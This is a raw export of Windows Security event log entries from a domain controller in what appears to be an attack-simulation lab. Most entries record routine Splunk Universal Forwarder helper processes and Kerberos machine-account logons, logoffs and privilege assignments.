Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264498
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1844
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264499
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81DF3F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53700
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:16:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264500
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264502
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x368
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264501
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264503
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x81DF3F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264506
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x820FE6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264505
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x820FE6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62712
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264504
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x820FE6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:17:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264507
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1904
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264508
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1390
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264509
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264510
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264511
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x444
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264513
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264512
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264519
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x823F9D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264518
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x823F9D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62720
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264517
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x823F9D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264516
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x823F31
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264515
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x823F31
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62719
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264514
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x823F31
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264522
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x824C57
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264521
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x824C57
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62728
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
